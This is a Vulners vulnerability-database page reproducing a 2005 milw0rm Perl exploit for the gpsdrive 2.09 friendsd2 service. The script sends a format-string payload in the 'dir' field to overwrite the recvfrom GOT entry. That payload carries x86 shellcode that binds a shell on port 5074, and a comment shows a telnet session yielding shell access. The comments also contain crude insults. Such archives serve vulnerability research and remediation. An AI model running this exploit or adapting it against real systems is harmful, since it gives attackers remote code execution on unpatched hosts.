Vulners
Lucene search
gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (x86)
#!/usr/bin/perl -w
#
# Code by KF, although it is most likely ripped from John H.
# (kf_lists[at]digital_munition[dot]com)
#
# http://www.digitalmunition.com
#
# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles.
# Free 14 day Testicle licking trial available!
#
# friendsd.c:367: fprintf (stderr, txt);
#
# Tested on intel using gpsdrive_2.09-2_i386.deb
#
# kfinisterre@animosity:~$ telnet localhost 5074
# Trying 127.0.0.1...
# Connected to animosity
# Escape character is '^]'.
# id;
# uid=1000(kfinisterre) gid=1000(kfinisterre) groups=1000(kfinisterre)
# : command not found
#
# [email protected]
# x86 portbind a shell in port 5074
# 92 bytes.
#
# This shit is NOT robust and most likely will NOT work on kernel 2.6.12
# because of the random address space. Find your own damn pointers to overwrite
#
$shellcode = "\x90" x 2 .
"\x31\xc0" . # xorl %eax,%eax
"\x50" . # pushl %eax
"\x40" . # incl %eax
"\x89\xc3" . # movl %eax,%ebx
"\x50" . # pushl %eax
"\x40" . # incl %eax
"\x50" . # pushl %eax
"\x89\xe1" . # movl %esp,%ecx
"\xb0\x66" . # movb $0x66,%al
"\xcd\x80" . # int $0x80
"\x31\xd2" . # xorl %edx,%edx
"\x52" . # pushl %edx
"\x66\x68\x13\xd2" . # pushw $0xd213
"\x43" . # incl %ebx
"\x66\x53" . # pushw %bx
"\x89\xe1" . # movl %esp,%ecx
"\x6a\x10" . # pushl $0x10
"\x51" . # pushl %ecx
"\x50" . # pushl %eax
"\x89\xe1" . # movl %esp,%ecx
"\xb0\x66" . # movb $0x66,%al
"\xcd\x80" . # int $0x80
"\x40" . # incl %eax
"\x89\x44\x24\x04" . # movl %eax,0x4(%esp,1)
"\x43" . # incl %ebx
"\x43" . # incl %ebx
"\xb0\x66" . # movb $0x66,%al
"\xcd\x80" . # int $0x80
"\x83\xc4\x0c" . # addl $0xc,%esp
"\x52" . # pushl %edx
"\x52" . # pushl %edx
"\x43" . # incl %ebx
"\xb0\x66" . # movb $0x66,%al
"\xcd\x80" . # int $0x80
"\x93" . # xchgl %eax,%ebx
"\x89\xd1" . # movl %edx,%ecx
"\xb0\x3f" . # movb $0x3f,%al
"\xcd\x80" . # int $0x80
"\x41" . # incl %ecx
"\x80\xf9\x03" . # cmpb $0x3,%cl
"\x75\xf6" . # jnz <shellcode+0x40>
"\x52" . # pushl %edx
"\x68\x6e\x2f\x73\x68" . # pushl $0x68732f6e
"\x68\x2f\x2f\x62\x69" . # pushl $0x69622f2f
"\x89\xe3" . # movl %esp,%ebx
"\x52" . # pushl %edx
"\x53" . # pushl %ebx
"\x89\xe1" . # movl %esp,%ecx
"\xb0\x0b" . # movb $0xb,%al
"\xcd\x80"; # int $0x80
use Net::Friends;
use Data::Dumper;
$name = 'GPSDRIVE-aaaa';
# 0804bb84 R_386_JUMP_SLOT recvfrom
$addy = "\x86\xbb\x04\x08"; # This is the write address.
$addy2 = "\x84\xbb\x04\x08";
#$retaddr = 0xbfffba7c; # Retaddr when using gdb
$retaddr = 0xbfffba8a; # Retaddr when NOT using gdb. Its that same kick you in the face styleee from the ppc sploit.
$lo = ($retaddr >> 0) & 0xffff;
$hi = ($retaddr >> 16) & 0xffff;
$hi = $hi - 0x4c;
$lo = (0x10000 + $lo) - $hi - 0x4c;
$hi =1; $lo =1;
$dir = "$addy$addy2%." . $hi . "d%379\$x%." . $lo . "d%380\$x$shellcode";
$friends = Net::Friends->new(shift || 'localhost');
$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir);
print Dumper($friends->query);
# P.S. - I fart in the general direction of Fr-Sirt.
# milw0rm.com [2005-11-04]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1